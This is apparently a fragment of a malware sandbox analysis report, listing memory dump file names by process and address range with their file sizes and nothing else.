                                                                                                                                                                                                              • memory/4628-302-0x0000000004C20000-0x0000000004C30000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                64KB

                                                                                                                                                                                                              • memory/4628-306-0x0000000007BF0000-0x0000000007F40000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                              • memory/4628-301-0x0000000004C20000-0x0000000004C30000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                64KB

                                                                                                                                                                                                              • memory/4772-2551-0x0000000000400000-0x00000000008DF000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.9MB

                                                                                                                                                                                                              • memory/4924-458-0x00000000009B0000-0x00000000009B1000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4924-475-0x0000000000400000-0x000000000071A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.1MB

                                                                                                                                                                                                              • memory/5076-56-0x0000000009690000-0x0000000009735000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                660KB

                                                                                                                                                                                                              • memory/5076-14-0x0000000006EF0000-0x0000000006F26000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                216KB

                                                                                                                                                                                                              • memory/5076-23-0x00000000080A0000-0x00000000083F0000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                              • memory/5076-16-0x0000000006FA0000-0x0000000006FB0000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                64KB

                                                                                                                                                                                                              • memory/5076-21-0x0000000007D90000-0x0000000007DF6000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                408KB

                                                                                                                                                                                                              • memory/5076-24-0x0000000007D30000-0x0000000007D4C000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                112KB

                                                                                                                                                                                                              • memory/5076-20-0x0000000007C10000-0x0000000007C32000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                136KB

                                                                                                                                                                                                              • memory/5076-19-0x00000000075E0000-0x0000000007C08000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.2MB

                                                                                                                                                                                                              • memory/5076-25-0x0000000008430000-0x000000000847B000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                300KB

                                                                                                                                                                                                              • memory/5076-18-0x0000000006FA0000-0x0000000006FB0000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                64KB

                                                                                                                                                                                                              • memory/5076-13-0x0000000073460000-0x0000000073B4E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.9MB

                                                                                                                                                                                                              • memory/5076-22-0x0000000007F70000-0x0000000007FD6000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                408KB

                                                                                                                                                                                                              • memory/5076-32-0x00000000086E0000-0x0000000008756000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                472KB

                                                                                                                                                                                                              • memory/5076-51-0x0000000009530000-0x000000000954E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                120KB

                                                                                                                                                                                                              • memory/5076-50-0x00000000700B0000-0x00000000700FB000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                300KB

                                                                                                                                                                                                              • memory/5076-57-0x0000000006FA0000-0x0000000006FB0000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                64KB

                                                                                                                                                                                                              • memory/5076-58-0x0000000009AC0000-0x0000000009B54000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                592KB

                                                                                                                                                                                                              • memory/5076-49-0x0000000009550000-0x0000000009583000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                204KB

                                                                                                                                                                                                              • memory/5076-251-0x0000000009A20000-0x0000000009A3A000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                104KB

                                                                                                                                                                                                              • memory/5076-256-0x0000000009A00000-0x0000000009A08000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                32KB

                                                                                                                                                                                                              • memory/5076-276-0x0000000073460000-0x0000000073B4E000-memory.dmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.9MB